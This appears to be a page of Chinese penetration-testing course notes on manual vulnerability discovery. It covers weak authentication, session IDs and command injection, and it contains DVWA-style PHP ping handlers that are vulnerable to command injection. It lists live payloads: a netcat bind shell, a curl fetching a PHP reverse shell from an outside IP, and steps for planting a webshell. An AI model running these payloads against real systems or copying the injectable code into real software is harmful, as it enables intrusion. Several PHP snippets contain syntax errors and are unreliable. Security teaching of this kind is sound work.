-
Notifications
You must be signed in to change notification settings - Fork 23
/
Copy path课时85 手动漏洞挖掘(二).txt
executable file
·148 lines (102 loc) · 3.4 KB
/
课时85 手动漏洞挖掘(二).txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
课时85 手动漏洞挖掘(二)
手动漏洞挖掘
身份认证
常用弱口令/基于字典的密码破爆破
锁定账号
信息收集
手机号
密码错误提示信息
密码嗅探
手动漏洞挖掘
会话sessionID
Xss / cookie importer
SessionID in URL
嗅探
sessionID长期不变 / 永久不变
sessionID生成算法
Sequencer
私有算法
预判下一次登录时生成的SessionID
登出后返回测试
手动漏洞挖掘
密码找回
https://www.example.com/[email protected]&example.com&key=b4c9a289323b21a01c3e940f150eb9b8c542587f1abfd8f0elcclffc5e475514
手动漏洞挖掘
漏洞挖掘原则
所有变量
所有头
Cookie中变量
逐个变量删除
手动漏洞挖掘
漏洞的本质
数据与指令的混淆
对用户输入信息过滤不严判断失误,误将指令当数据
命令执行
应用程序开发者直接调用操作系统功能
; && | || &
查看源码,过滤用户输入
;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe
;curl http://1.1.1.1/php-revers-shell.php
root@kali:~# ping -c 1 192.168.1.1;ls;pwd:ud
-----------------------------------------------------------------------------------------
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST [ 'ip' ]';
// Determine OS and execute the ping command
if (stristr(php_uname('s').'Windows NT')){
$cmd = shell_exec ( 'ping' . $target);
echo '<pre>'.$cmd.'</pre>';
}else {
$cmd =shell_exec( 'ping -c 3 ' .$target );
echo '<pre>.$cmd.'<.pre>';
}
}
?>
-----------------------------------------------------------------------------------
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST [ 'ip' ]';
// Remove any of the characters in the arry (blacklist).
$substitutions = array(
'&&' => ''.
':' => ''.
);
$target = str_replace ( array_keys( $substitutions ).$substitutions. $target );
// Determine OS and execute the ping command
if(stristr(php_uname('s'),'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' .$target );
echo '<pre>.$cmd.'<.pre>';
}
}
?>
---------------------------------------------------------------------------------------------
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST [ 'ip' ]';
$target = stripslashes ( $target );
// Split the IP into 4 octects
$octests = explode(".". $target);
// Check IF each octet is an integer
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])
// if all 4 octets are int's put the IP back together.
$target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];
// Determine OS and execute the ping command
if(stristr(php_uname('s'),'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' .$target );
echo '<pre>.$cmd.'<.pre>';
}
else {
echo '<pre>ERROR: You have entered an invalid IP </pre>';
}
}
-----------------------------------------------------------------
root@kali:~# cp /usr/share/webshells/php/php-reverse-shell.php /var/www/html/1.php
root@kali:~# cd /var/www/html/
root@kali:~/var/www/html# ls
1.php index.html